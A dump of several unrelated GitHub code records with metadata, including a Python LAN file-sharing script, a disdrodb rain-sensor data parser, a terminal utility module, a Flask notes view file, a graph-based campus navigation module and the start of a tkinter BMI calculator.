and you can share the files\")\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname) #this gets the hostname and your device ip address\n\ns=\"Press the letter B to go to previous directory or Q to exit and H to Host\" \nprint(\"\\033[1m\" + s + \"\\033[0m\") #This line of code is to print the stringns in bold format\nwhile True:\n print(\"your current working directory is :\"+ os.getcwd()) #prionting the current working directory\n dir_list=os.listdir()\n #print(\"The contents in this directory:\" + str(dir_list))\n print(\"There are \"+ str(len(dir_list)) +\" Elements in this directory\") #printing thr number of elements in the current working directory\n number=[]\n i=1\n for x in range(len(dir_list)): #creating a list of numbers to assign as keys for the upcoming dictionary\n number.append(i)\n i+=1\n #print(number)\n #print(dir_list) \n dict = {} #initializing the empty dictionary\n for key in number: #this loop combines the list of the numbers and the list of the names of the directories into a single dictionary called dict\n for value in dir_list:\n dict[key] = value\n dir_list.remove(value)\n break \n #print(dict)\n for key, value in dict.items(): #prints the dictionary 'dict in a formatted way'\n print(key, ' : ', value)\n \n a=(input(\"Enter the number to select:\")) #This elif ladder takes input 'a' from the user and performs the following actions\n if a == 'b' or a == 'B': #if the input is 'b' or 'B' then it points to the previous parent firectory\n os.chdir(os.path.abspath(os.path.join(os.getcwd(), os.pardir)))\n print(\"New path =\"+ os.getcwd())\n elif a == 'q' or a == 'Q': #if the input is 'q' or 'Q' then the program/loop will be terminated\n break\n elif a == 'h' or 'H': #if the input is 'h' or 'H' then the link and its qr code is displayed and also that present directory will gets hosted\n print(\"The link is \"+ip_address+\":8090\")\n link=\"The link is \"+ip_address+\":8090\"\n cmd = \"{0} -{1} {2}\".format(\"qrencode -t ASCII \",\"o qrcode.txt\",ip_address)# (sudo apt install qrencode)\n os.system(cmd) \n os.system(\"cat qrcode.txt\")\n os.system(\"sudo rm qrcode.txt\")\n np=\"{0} {1}\".format(\"cd \",os.getcwd())\n os.system(np)\n os.system(\"python3 -m http.server 8090\")\n \n else: #else if any number is entered the corresponding directory will be opened for further operations\n print(dict.get(int(a)))\n os.chdir(dict.get(int(a))) \n print(\"New path =\"+ os.getcwd())\n","repo_name":"nagarjunags/Fun_projects","sub_path":"Python File sharing/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36640305712","text":"import os\nimport click\nimport time\nimport logging\nimport xarray as xr\nimport numpy as np\n\n# Directory \nfrom disdrodb.io import check_directories\nfrom disdrodb.io import get_campaign_name\nfrom disdrodb.io import create_directory_structure\n\n# Metadata \nfrom disdrodb.metadata import read_metadata\nfrom disdrodb.check_standards import check_sensor_name\n\n# IO \nfrom disdrodb.io import get_L0_fpath\nfrom disdrodb.io import get_L1_netcdf_fpath\nfrom disdrodb.io import read_L0_data\n\n# L0_processing\nfrom disdrodb.check_standards import check_L0_column_names\nfrom disdrodb.check_standards import check_L0_standards\nfrom disdrodb.L0_proc import get_file_list\nfrom disdrodb.L0_proc import read_L0_raw_file_list\nfrom disdrodb.L0_proc import write_df_to_parquet\n\n# L1_processing\nfrom disdrodb.L1_proc import create_L1_dataset_from_L0\nfrom disdrodb.L1_proc import write_L1_to_netcdf\nfrom disdrodb.L1_proc import create_L1_summary_statistics\n\n# Logger \nfrom disdrodb.logger import create_logger\nfrom disdrodb.logger import close_logger\n\n\n# -------------------------------------------------------------------------.\n# CLIck Command Line Interface decorator\n@click.command() # options_metavar=''\n@click.argument('raw_dir', type=click.Path(exists=True), metavar='')\n@click.argument('processed_dir', metavar='')\n@click.option('-l0', '--l0_processing', type=bool, show_default=True, default=True, help=\"Perform L0 processing\")\n@click.option('-l1', '--l1_processing', type=bool, show_default=True, default=True, help=\"Perform L1 processing\")\n@click.option('-nc', '--write_netcdf', type=bool, show_default=True, default=True, help=\"Write L1 netCDF4\")\n@click.option('-f', '--force', type=bool, show_default=True, default=False, help=\"Force overwriting\")\n@click.option('-v', '--verbose', type=bool, show_default=True, default=False, help=\"Verbose\")\n@click.option('-d', '--debugging_mode', type=bool, show_default=True, default=False, help=\"Switch to debugging mode\")\n@click.option('-l', '--lazy', type=bool, show_default=True, default=True, help=\"Use dask if lazy=True\")\ndef main(raw_dir,\n processed_dir,\n l0_processing=True,\n l1_processing=True,\n write_netcdf=True,\n force=False,\n verbose=False,\n debugging_mode=False,\n lazy=True,\n ):\n \"\"\"Script to process raw data to L0 and L1. \\f\n \n Parameters\n ----------\n raw_dir : str\n Directory path of raw file for a specific campaign.\n The path should end with .\n Example raw_dir: '<...>/disdrodb/data/raw/'.\n The directory must have the following structure:\n - /data//\n - /metadata/.json \n For each there must be a corresponding JSON file\n in the metadata subfolder.\n processed_dir : str\n Desired directory path for the processed L0 and L1 products. \n The path should end with and match the end of raw_dir.\n Example: '<...>/disdrodb/data/processed/'.\n l0_processing : bool\n Whether to launch processing to generate L0 Apache Parquet file(s) from raw data.\n The default is True.\n l1_processing : bool\n Whether to launch processing to generate L1 netCDF4 file(s) from source netCDF or L0 data. \n The default is True.\n write_netcdf: bool \n Whether to save L1 as netCDF4 archive\n Write_netcdf must be True.\n force : bool\n If True, overwrite existing data into destination directories. \n If False, raise an error if there are already data into destination directories. \n The default is False\n verbose : bool\n Whether to print detailed processing information into terminal. \n The default is False.\n debugging_mode : bool\n If True, it reduces the amount of data to process.\n - For L0 processing, it processes just 3 raw data files.\n - For L1 processing, it takes a small subset of the Apache Parquet dataframe.\n The default is False.\n lazy : bool\n Whether to perform processing lazily with dask. \n If lazy=True, it employed dask.array and dask.dataframe.\n If lazy=False, it employed pandas.DataFrame and numpy.array.\n The default is True.\n \n Additional information:\n - The campaign name must semantically match between:\n - The ends of raw_dir and processed_dir paths \n - The attribute 'campaign' within the metadata JSON file. \n - The campaign name are set to be UPPER CASE. \n \n \"\"\"\n ####----------------------------------------------------------------------.\n ###########################\n #### CUSTOMIZABLE CODE ####\n ###########################\n #### - Define raw data headers\n # Notes\n # - In all files, the datalogger voltage hasn't the delimeter,\n # so need to be split to obtain datalogger_voltage and rainfall_rate_32bit\n \n column_names = ['temp1',\n 'temp2',\n 'temp3',\n 'temp4',\n 'temp5',\n 'temp6',\n 'temp7',\n 'temp8',\n 'temp9',\n 'temp10',\n 'temp11',\n 'temp12',\n 'temp13',\n 'temp14',\n 'temp15',\n 'temp16',\n 'temp17',\n 'temp18',\n 'temp19',\n 'temp20',\n 'temp21',\n 'temp22',\n 'temp23']\n\n # - Check name validity\n check_L0_column_names(column_names)\n\n ##------------------------------------------------------------------------.\n #### - Define reader options\n\n reader_kwargs = {}\n # - Define delimiter\n reader_kwargs[\"delimiter\"] = \";\"\n\n # - Avoid first column to become df index !!!\n reader_kwargs[\"index_col\"] = False\n\n # - Define behaviour when encountering bad lines\n reader_kwargs[\"on_bad_lines\"] = \"skip\"\n\n # - Define parser engine\n # - C engine is faster\n # - Python engine is more feature-complete\n reader_kwargs[\"engine\"] = \"python\"\n\n # - Define on-the-fly decompression of on-disk data\n # - Available: gzip, bz2, zip\n reader_kwargs[\"compression\"] = \"infer\"\n\n # - Strings to recognize as NA/NaN and replace with standard NA flags\n # - Already included: ‘#N/A’, ‘#N/A N/A’, ‘#NA’, ‘-1.#IND’, ‘-1.#QNAN’,\n # ‘-NaN’, ‘-nan’, ‘1.#IND’, ‘1.#QNAN’, ‘’, ‘N/A’,\n # ‘NA’, ‘NULL’, ‘NaN’, ‘n/a’, ‘nan’, ‘null’\n reader_kwargs[\"na_values\"] = [\n \"na\",\n \"\",\n \"error\",\n \"NA\",\n \"Error in data reading! 0000.000\",\n ]\n\n # - Define max size of dask dataframe chunks (if lazy=True)\n # - If None: use a single block for each file\n # - Otherwise: \"MB\" by which to cut up larger files\n reader_kwargs[\"blocksize\"] = None # \"50MB\"\n\n # Cast all to string\n reader_kwargs[\"dtype\"] = str\n\n # Different enconding for this campaign\n reader_kwargs[\"encoding\"] = \"latin-1\"\n\n # Skip first row as columns names\n reader_kwargs[\"header\"] = None\n\n ##------------------------------------------------------------------------.\n #### - Define facultative dataframe sanitizer function for L0 processing\n # - Enable to deal with bad raw data files\n # - Enable to standardize raw data files to L0 standards (i.e. time to datetime)\n df_sanitizer_fun = None\n\n def df_sanitizer_fun(df, lazy=False):\n # Import dask or pandas \n if lazy: \n import dask.dataframe as dd\n else: \n import pandas as dd\n \n column_names = ['time',\n 'latitude',\n 'longitude',\n 'weather_code_synop_4680',\n 'weather_code_synop_4677',\n 'reflectivity_32bit',\n 'mor_visibility',\n 'laser_amplitude',\n 'number_particles',\n 'sensor_temperature',\n 'sensor_heating_current',\n 'sensor_battery_voltage',\n 'datalogger_error',\n 'rainfall_amount_absolute_32bit',\n 'All_0',\n 'raw_drop_concentration',\n 'raw_drop_average_velocity',\n 'raw_drop_number',\n ]\n\n column_names_2 = ['id',\n 'latitude',\n 'longitude',\n 'time',\n 'all_nan',\n 'rainfall_rate_32bit',\n 'rainfall_accumulated_32bit',\n 'weather_code_synop_4680',\n 'weather_code_synop_4677',\n 'reflectivity_32bit',\n 'mor_visibility',\n 'laser_amplitude',\n 'number_particles',\n 'sensor_temperature',\n 'sensor_heating_current',\n 'sensor_battery_voltage',\n 'All_0',\n 'rainfall_amount_absolute_32bit',\n 'datalogger_error',\n 'raw_drop_concentration',\n 'raw_drop_average_velocity',\n 'raw_drop_number',\n 'End_line'\n ]\n \n # - Drop all nan in latitude (define in reader_kwargs['na_values'])\n df = df[~df.iloc[:,1].isna()]\n if len(df.index) == 0:\n df.columns = ['latitude',\n 'longitude',\n 'time',\n 'rainfall_rate_32bit',\n 'rainfall_accumulated_32bit',\n 'weather_code_synop_4680',\n 'weather_code_synop_4677',\n 'reflectivity_32bit',\n 'mor_visibility',\n 'laser_amplitude',\n 'number_particles',\n 'sensor_temperature',\n 'sensor_heating_current',\n 'sensor_battery_voltage',\n 'rainfall_amount_absolute_32bit',\n 'raw_drop_concentration',\n 'raw_drop_average_velocity',\n 'raw_drop_number',\n ]\n # df = df.iloc[:,:18]\n return df\n \n # - If first column is ID, than is a different format\n \n if lazy:\n flag = df.iloc[:,0].str.isnumeric().all().compute()\n else:\n flag = df.iloc[:,0].str.isnumeric().all()\n \n if flag:\n # - Rename columns\n df.columns = column_names_2\n # - Remove ok from rainfall_rate_32bit\n if lazy:\n df[\"rainfall_rate_32bit\"] = df[\"rainfall_rate_32bit\"].str.replace(\"OK,\",\"\")\n else:\n # df['rainfall_rate_32bit'] = df['rainfall_rate_32bit'].str.split(',').str[-1]\n # - Suppress SettingWithCopyWarning error (A value is trying to be set on a copy of a slice from a DataFrame)\n dd.options.mode.chained_assignment = None\n df['rainfall_rate_32bit'] = df['rainfall_rate_32bit'].str.split(',').str[-1]\n \n # - Drop useless columns\n col_to_drop = [\"id\", \"all_nan\", \"All_0\", 'datalogger_error', 'End_line']\n df = df.drop(columns=col_to_drop)\n \n # - Check latutide and longitute\n df = df.loc[df[\"latitude\"].astype(str).str.len() < 11]\n df = df.loc[df[\"longitude\"].astype(str).str.len() < 11]\n \n # - Convert time column to datetime \n df['time'] = dd.to_datetime(df['time'], errors='coerce')\n df = df.dropna()\n if len(df.index) == 0:\n for col in col_to_drop:\n column_names_2.remove(col)\n df.columns = column_names_2\n return df\n df['time'] = dd.to_datetime(df['time'], format='%d-%m-%Y %H:%M:%S')\n \n else:\n \n # - Drop excedeed columns\n df = df.iloc[:,:18]\n # - Rename columns\n df.columns = column_names\n # - Drop useless columns\n col_to_drop = [\"All_0\", 'datalogger_error']\n df = df.drop(columns=col_to_drop)\n # - Convert time column to datetime \n df['time'] = dd.to_datetime(df['time'], errors='coerce')\n df = df.dropna()\n if len(df.index) == 0:\n for col in col_to_drop:\n column_names.remove(col)\n df.columns = column_names\n return df\n df['time'] = dd.to_datetime(df['time'], format='%d/%m/%Y %H:%M:%S')\n\n # - Drop columns if nan\n col_to_drop_if_na = ['latitude','longitude','raw_drop_concentration','raw_drop_average_velocity','raw_drop_number']\n df = df.dropna(subset = col_to_drop_if_na)\n \n # - Drop invalid raw_drop_concentration, raw_drop_average_velocity and raw_drop_number\n df = df.loc[df[\"raw_drop_concentration\"].astype(str).str.len() == 224]\n df = df.loc[df[\"raw_drop_average_velocity\"].astype(str).str.len() == 224]\n df = df.loc[df[\"raw_drop_number\"].astype(str).str.len() == 4096]\n \n df = df[df['raw_drop_number'].str.contains('0\\x100') == False]\n \n # - Cast dataframe to dtypes\n from disdrodb.data_encodings import get_L0_dtype_standards\n dtype_dict = get_L0_dtype_standards(sensor_name=sensor_name)\n \n dtype_dict_not_object = {}\n for k, v in dtype_dict.items():\n if v != 'object':\n dtype_dict_not_object[k] = v\n dtype_dict_not_object.pop('time')\n \n for column in df.columns:\n if column in dtype_dict_not_object:\n df[column] = dd.to_numeric(df[column], errors='coerce')\n invalid_rows_index = df.loc[df[column].isna()].index\n if lazy:\n if invalid_rows_index.size.compute() != 0:\n df = df.dropna(subset=[column])\n else:\n if invalid_rows_index.size != 0:\n df = df.dropna(subset=[column])\n # df = df.drop(invalid_rows_index)\n df[column] = df[column].astype(dtype_dict[column])\n\n return df\n\n ##------------------------------------------------------------------------.\n #### - Define glob pattern to search data files in raw_dir/data/\n raw_data_glob_pattern= \"*.log*\"\n\n ####----------------------------------------------------------------------.\n ####################\n #### FIXED CODE ####\n ####################\n # -------------------------------------------------------------------------.\n # Initial directory checks\n raw_dir, processed_dir = check_directories(raw_dir, processed_dir, force=force)\n\n # Retrieve campaign name\n campaign_name = get_campaign_name(raw_dir)\n\n # -------------------------------------------------------------------------.\n # Define logging settings\n create_logger(processed_dir, \"parser_\" + campaign_name)\n # Retrieve logger\n logger = logging.getLogger(campaign_name)\n logger.info(\"### Script started ###\")\n\n # -------------------------------------------------------------------------.\n # Create directory structure\n create_directory_structure(raw_dir, processed_dir)\n\n # -------------------------------------------------------------------------.\n #### Loop over station_id directory and process the files\n list_stations_id = os.listdir(os.path.join(raw_dir, \"data\"))\n\n # station_id = list_stations_id[1]\n for station_id in list_stations_id:\n # ---------------------------------------------------------------------.\n logger.info(f\" - Processing of station_id {station_id} has started\")\n # ---------------------------------------------------------------------.\n # Retrieve metadata\n attrs = read_metadata(raw_dir=raw_dir, station_id=station_id)\n\t\t\n # Retrieve sensor name\n sensor_name = attrs['sensor_name']\n check_sensor_name(sensor_name)\n\n # ---------------------------------------------------------------------.\n #######################\n #### L0 processing ####\n #######################\n if l0_processing:\n # Start L0 processing\n t_i = time.time()\n msg = \" - L0 processing of station_id {} has started.\".format(station_id)\n if verbose:\n print(msg)\n logger.info(msg)\n\n # -----------------------------------------------------------------.\n #### - List files to process\n glob_pattern = os.path.join(\"data\", station_id, raw_data_glob_pattern)\n file_list = get_file_list(\n raw_dir=raw_dir,\n glob_pattern=glob_pattern,\n verbose=verbose,\n debugging_mode=debugging_mode,\n )\n \n\n ##------------------------------------------------------.\n #### - Read all raw data files into a dataframe \n df = read_L0_raw_file_list(file_list=file_list,\n column_names=column_names,\n reader_kwargs=reader_kwargs,\n df_sanitizer_fun=df_sanitizer_fun,\n lazy=lazy,\n sensor_name=sensor_name,\n verbose=verbose)\n\n ##------------------------------------------------------.\n #### - Write to Parquet\n fpath = get_L0_fpath(processed_dir, station_id)\n write_df_to_parquet(df=df, fpath=fpath, force=force, verbose=verbose)\n ##------------------------------------------------------.\n #### - Check L0 file respects the DISDRODB standards\n check_L0_standards(fpath=fpath, sensor_name=sensor_name, verbose=verbose)\n ##------------------------------------------------------.\n # End L0 processing\n t_f = time.time() - t_i\n msg = \" - L0 processing of station_id {} ended in {:.2f}s\".format(\n station_id, t_f\n )\n if verbose:\n print(msg)\n logger.info(msg)\n\n ##------------------------------------------------------.\n # Delete temp variables\n del df\n\n # ---------------------------------------------------------------------.\n #######################\n #### L1 processing ####\n #######################\n if l1_processing:\n # Start L1 processing\n t_i = time.time()\n msg = \" - L1 processing of station_id {} has started.\".format(station_id)\n if verbose:\n print(msg)\n logger.info(msg)\n ##----------------------------------------------------------------.\n #### - Read L0\n df = read_L0_data(\n processed_dir,\n station_id,\n lazy=lazy,\n verbose=verbose,\n debugging_mode=debugging_mode,\n )\n\n # -----------------------------------------------------------------.\n #### - Create xarray Dataset\n ds = create_L1_dataset_from_L0(\n df=df, attrs=attrs, lazy=lazy, verbose=verbose\n )\n\n # -----------------------------------------------------------------.\n #### - Write L1 dataset to netCDF4\n if write_netcdf:\n fpath = get_L1_netcdf_fpath(processed_dir, station_id)\n write_L1_to_netcdf(ds, fpath=fpath, sensor_name=sensor_name)\n\n # -----------------------------------------------------------------.\n #### - Compute L1 summary statics\n create_L1_summary_statistics(\n ds,\n processed_dir=processed_dir,\n station_id=station_id,\n sensor_name=sensor_name,\n )\n\n # -----------------------------------------------------------------.\n # End L1 processing\n t_f = time.time() - t_i\n msg = \" - L1 processing of station_id {} ended in {:.2f}s\".format(\n station_id, t_f\n )\n if verbose:\n print(msg)\n print(\" --------------------------------------------------\")\n logger.info(msg)\n\n # -----------------------------------------------------------------.\n # ---------------------------------------------------------------------.\n # -------------------------------------------------------------------------.\n if verbose:\n print(msg)\n logger.info(\"---\")\n logger.info(msg)\n logger.info(\"---\")\n\n msg = \"### Script finish ###\"\n print(msg)\n logger.info(msg)\n\n close_logger(logger)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"regislon/disdrodb","sub_path":"disdrodb/readers/EPFL/parser_SAMOYLOV_2017_2019.py","file_name":"parser_SAMOYLOV_2017_2019.py","file_ext":"py","file_size_in_byte":21898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"5048563689","text":"import contextlib\nimport colored\nimport termios\nimport select\nimport tty\nimport sys\nimport re\nimport os\n\n\nCOLOR_NAMES = {\n 'pink': 176,\n 'red': 9,\n 'purple': 69,\n 'blue_green': 43,\n 'light_orange': 173,\n 'light_green': 151,\n 'dark_green': 65,\n 'dark_purple': 60,\n}\n\nANSI_SPECIAL_KEY = '\\x1b'\nANSI_COMMANDS = {\n 'hide_cursor': \"\\x1b[?25l\",\n 'show_cursor': \"\\x1b[?25h\",\n 'get_cursor_position': \"\\x1b[6n\",\n 'clear_lines': '\\x1b[1A\\r\\033[K',\n}\n\nKEYS = {\n '\\r': 'enter',\n '\\x1b\\x5b\\x41': 'arrow_up',\n '\\x1b\\x5b\\x42': 'arrow_down',\n}\n\n\ndef _execute_ansi_command(command_name, *args):\n sys.stdout.write(ANSI_COMMANDS[command_name].format(*args))\n\n\ndef colorize(text, color=251, attrib=None):\n if color in COLOR_NAMES:\n color = COLOR_NAMES[color]\n\n style = colored.fg(color)\n if attrib is not None:\n style += colored.attr(attrib)\n return colored.stylize(text, style, colored.attr('reset'))\n\n\ndef clear_lines(num_of_lines):\n for line in range(num_of_lines):\n _execute_ansi_command('clear_lines')\n\n\ndef get_terminal_size():\n rows, columns = os.popen('stty size', 'r').read().split()\n return int(rows), int(columns)\n\n\ndef clear_text(text):\n _, terminal_columns = get_terminal_size()\n stripped_ansi_text = strip_ansi(text)\n text_lines = stripped_ansi_text.expandtabs().split('\\n')\n lines_to_clear = len(text_lines) - 1\n for line in text_lines:\n lines_to_clear += len(line) / terminal_columns\n clear_lines(lines_to_clear)\n\n\ndef get_cursor_position():\n _execute_ansi_command('get_cursor_position')\n ansi_result = \"\"\n while not ansi_result.endswith(\"R\"):\n ansi_result += getch()\n pos_y, pos_x = re.findall(r\"^\\x1b\\[(\\d*);(\\d*)R\", ansi_result)[0]\n return int(pos_x), int(pos_y)\n\n\ndef strip_ansi(text):\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n stripped_text = ansi_escape.sub('', text)\n return stripped_text\n\n\ndef hide_cursor():\n _execute_ansi_command('hide_cursor')\n\n\ndef show_cursor():\n _execute_ansi_command('show_cursor')\n\n\n@contextlib.contextmanager\ndef hidden_cursor():\n try:\n hide_cursor()\n yield\n finally:\n show_cursor()\n\n\ndef get_keypress():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n user_key = sys.stdin.read(1)\n if user_key == ANSI_SPECIAL_KEY:\n user_key += sys.stdin.read(2)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n if user_key in KEYS:\n user_key = KEYS[user_key]\n return user_key\n","repo_name":"Shukasa4/yummy","sub_path":"yummy/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7086967679","text":"from flask import Blueprint, render_template, flash, request, redirect, url_for\r\nfrom . import db\r\nfrom .models import Note\r\nfrom flask_login import login_required, current_user\r\nimport json\r\n\r\nviews = Blueprint('views',__name__)\r\n\r\n@views.route('/', methods=['GET','POST'])\r\n@login_required\r\ndef home():\r\n\treturn render_template(\"home.html\", user=current_user)\r\n\r\n@views.route('/new_log', methods=['GET','POST'])\r\n@login_required\r\ndef new_log():\r\n\tif request.method == \"POST\":\r\n\t\tc_firstName = request.form.get('c_firstName')\r\n\t\tc_email = request.form.get('c_email')\r\n\t\tc_final_score = request.form.get('c_final_score')\r\n\t\tnote = request.form.get('note')\r\n\t\tc_Comm = request.form.get('c_Comm')\r\n\t\tc_Con = request.form.get('c_Con')\r\n\t\tc_Tech = request.form.get('c_Tech')\r\n\t\tc_Employ = request.form.get('c_Employ')\r\n\r\n\t\tcand = Note.query.filter_by(c_email = c_email).first()\r\n\t\tif cand:\r\n\t\t\tflash(\"Duplicate candidate entries not allowed!\", category='error')\r\n\t\telse:\r\n\t\t\tnew_entry = Note(data=note, c_firstName=c_firstName, c_email = c_email, user_id=current_user.id,\t c_Comm = c_Comm, c_Con=c_Con, c_Tech=c_Tech, c_Employ=c_Employ, c_final_score=c_final_score)\r\n\t\t\tdb.session.add(new_entry)\r\n\t\t\tprint(new_entry)\r\n\t\t\tdb.session.commit()\r\n\t\t\tflash('Candidate Accepted for Assessment', category='Success')\r\n\t\t\treturn redirect(url_for(\"views.home\"))\r\n\t\t\t\r\n\treturn render_template(\"new_log.html\", user = current_user)\r\n\t\r\n\r\n@views.route('/delete-note', methods=['POST'])\r\ndef delete_note():\r\n note = json.loads(request.data)\r\n noteId = note['noteId']\r\n note = Note.query.get(noteId)\r\n if note:\r\n if note.user_id == current_user.id:\r\n db.session.delete(note)\r\n db.session.commit()\r\n\r\n return jsonify({})\r\n\r\n@views.route('/displayNote', methods=['GET','POST'])\r\ndef displayNote():\r\n\tres = {}\r\n\tnote = json.loads(request.data)\r\n\tnoteId = note['noteId']\r\n\tnote = Note.query.get(noteId)\r\n\treturn note","repo_name":"SamJeosh/hiring-support","sub_path":"Yourself/Yourself/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26500598148","text":"from collections import defaultdict\nimport sys\nfrom src.Heap import Heap\nimport csv\nimport json\nimport re\nfrom src.Node import Node\nfrom math import sqrt\nfrom time import sleep\n\n\ndef initialize_map(filename):\n f = open(filename)\n data = json.load(f)\n nodes = {}\n map_node = {}\n for key, node in data.items():\n temp_node = Node(\n number=node[\"Node number\"], ## dont change this to -1\n name=node[\"Node Name\"],\n x=int(node[\"x_pos\"]),\n y=int(node[\"y_pos\"]),\n node_type=node[\"Type \"],\n floor=int(node[\"Floor\"]),\n building=node[\"Building\"]\n )\n nodes[int(key)-1] = temp_node\n map_node[node[\"Node Name\"]] = int(node[\"Node number\"])-1\n return nodes,map_node\n\ndef get_image_mapping(filename):\n f = open(filename)\n data = json.load(f)\n images = {}\n for key, value in data.items():\n images[key] = value\n return images\n\nclass Graph():\n\n def __init__(self, V, nodes):\n self.V = V\n self.graph = defaultdict(list)\n self.nodes = nodes\n\n def calculateDistance(self, src, dest):\n return sqrt(pow(self.nodes[src].x - self.nodes[dest].x, 2)+pow(self.nodes[src].y-self.nodes[dest].y, 2))\n\n def addEdge(self, src, dest):\n weight = self.calculateDistance(src, dest)\n # print(src, dest, weight)\n newNode = [dest, weight]\n self.graph[src].insert(0, newNode)\n newNode = [src, weight]\n self.graph[dest].insert(0, newNode)\n\n def addAllEdges(self, input_file):\n with open(input_file, 'r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n self.addEdge(int(row['Nodes']), int(row['Adjacents']))\n\n def getPath(self, parent, j, path):\n if parent[j] == -1 :\n return\n self.getPath(parent , parent[j], path)\n # print (j, \"\\t\", self.nodes[j].name)\n path.append(j)\n\n\n def getSolution(self, dist, parent, source, dest):\n # print(\"Vertex \\t\\tDistance from Source\\tPath\")\n path = []\n path.append(source)\n self.getPath(parent, dest, path)\n print()\n return path\n\n def getDirections(self, path, dest):\n directions = []\n directions_text = \"\"\n # print(\"In directions: \", path)\n for i in range(1, len(path)):\n ## case 1: for first node - only parent is considered\n if i==1:\n curr = path[i]\n prev = path[i-1]\n if self.nodes[curr].x > self.nodes[prev].x and self.nodes[curr].y == self.nodes[prev].y:\n directions.append('Right')\n elif self.nodes[curr].x < self.nodes[prev].x and self.nodes[curr].y == self.nodes[prev].y:\n directions.append('Left')\n elif self.nodes[curr].x == self.nodes[prev].x and self.nodes[curr].y > self.nodes[prev].y:\n directions.append('Straight')\n elif self.nodes[curr].x == self.nodes[prev].x and self.nodes[curr].y < self.nodes[prev].y:\n directions.append('Back')\n else:\n directions.append(\"check em\")\n if(directions[-1]!='Straight'):\n directions_text = \"First turn {} and keep walking\".format(directions[-1])\n else:\n directions_text = \"Walk straight\"\n if(self.nodes[curr].name!=\"\"):\n directions_text+= \" till you reach \" + self.nodes[curr].name+\".\"\n else:\n directions_text+=\".\"\n\n else:\n x1 = self.nodes[path[i-2]].x # x1,y1 -> x2,y2\n y1 = self.nodes[path[i-2]].y\n x2 = self.nodes[path[i-1]].x\n y2 = self.nodes[path[i-1]].y\n x3 = self.nodes[path[i]].x\n y3 = self.nodes[path[i]].y\n if(x2>x1 and y1==y2):\n if(y3>y2 and x2==x3):\n directions.append('Left')\n elif(y2>y3 and x2==x3):\n directions.append('Right')\n elif(x3>x2 and y2==y3):\n directions.append('Straight')\n elif (x3 < x2 and y2 == y3):\n directions.append('Back')\n else:\n directions.append('check em x2x1')\n\n elif (x2 < x1 and y1 == y2):\n if (y3 > y2 and x2 == x3):\n directions.append('Right')\n elif (y2 > y3 and x2 == x3):\n directions.append('Left')\n elif (x3 > x2 and y2 == y3):\n directions.append('Back')\n elif (x3 < x2 and y2 == y3):\n directions.append('Straight')\n else:\n directions.append('check em x1x2')\n\n elif (x2 == x1 and y1 < y2):\n if (x3 > x2 and y2 == y3):\n directions.append('Right')\n elif (x2 > x3 and y2 == y3):\n directions.append('Left')\n elif (y3 < y2 and x2 == x3):\n directions.append('Back')\n elif (y3 > y2 and x2 == x3):\n directions.append('Straight')\n else:\n directions.append('check em y2y1')\n\n elif (x2 == x1 and y1 > y2):\n if (x3 > x2 and y2 == y3):\n directions.append('Left')\n elif (x2 > x3 and y2 == y3):\n directions.append('Right')\n elif (y3 < y2 and x2 == x3):\n directions.append('Straight')\n elif (y3 > y2 and x2 == x3):\n directions.append('Back')\n else:\n directions.append('check em y1y2')\n\n if(directions[-1]=='Straight'):\n if directions[-2]!='Straight':\n directions_text+=\" Continue straight.\"\n else:\n if(self.nodes[path[i-1]].name!=''):\n directions_text+=\" Now at {} turn {}.\".format(self.nodes[path[i-1]].name, directions[-1])\n else:\n directions_text+=\" Take the next \"+ directions[-1] + \".\"\n if i==len(path)-1:\n directions_text+=\" You have now arrived at \"+self.nodes[dest].name+\". \"\n\n return directions, directions_text\n\n\n def dijkstra(self, src, dest):\n V = self.V\n dist = []\n minHeap = Heap()\n directions = []\n parents = [-1]*(len(self.nodes))\n path = []\n path.append(src)\n for v in range(V):\n dist.append(sys.maxsize)\n minHeap.array.append( minHeap.newMinHeapNode(v, dist[v]))\n minHeap.pos.append(v)\n\n minHeap.pos[src] = src\n dist[src] = 0\n minHeap.decreaseKey(src, dist[src])\n\n minHeap.size = V\n\n while minHeap.isEmpty() == False:\n newHeapNode = minHeap.extractMin()\n\n u = newHeapNode[0]\n\n for pCrawl in self.graph[(u)]:\n v = pCrawl[0]\n if minHeap.isInMinHeap(v) and dist[u] != sys.maxsize and pCrawl[1] + dist[u] < dist[v]:\n dist[v] = pCrawl[1] + dist[u]\n parents[v] = u\n minHeap.decreaseKey(v, dist[v])\n path = self.getSolution(dist, parents, src, dest)\n directions, directions_text = self.getDirections(path, dest)\n return round(dist[dest], 2), path, directions, directions_text\n\ndef getPath(destination,source):\n src_number = map_node[source]\n if destination:\n dest_number = map_node[destination]\n floor_navigation = \"\"\n if dest_number == 23 :\n dest_number = 1\n floor_navigation = \" Take the stairs to reach the first floor. Turn left. Walk straight. You have now arrived at Director's Office.\"\n elif dest_number == 11:\n dest_number = 10\n floor_navigation = \" Take the stairs to reach the first floor. Turn left.You have now arrived at Library.\"\n distance, path, directions, directions_text = graph.dijkstra(src_number, dest_number)\n directions_text = directions_text + floor_navigation\n return directions_text\n return \"\"\n","repo_name":"VidhiRambhia/VJTI-Navigation","sub_path":"Alexa-Skill/src/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72546381927","text":"from tkinter import *\nw = Tk()\nw.geometry('480x380+500+100')\nw.title('BMI CALCULATOR')\nF1 = Frame(master =w,bg= \"green\")\nF1.place(x=10,y=20,width =100)\nF2 = Frame(w)\nF2.place(x=240,y=40)\nx = IntVar()\n\n\nL1= Label(F1, text = 'CHIỀU CAO 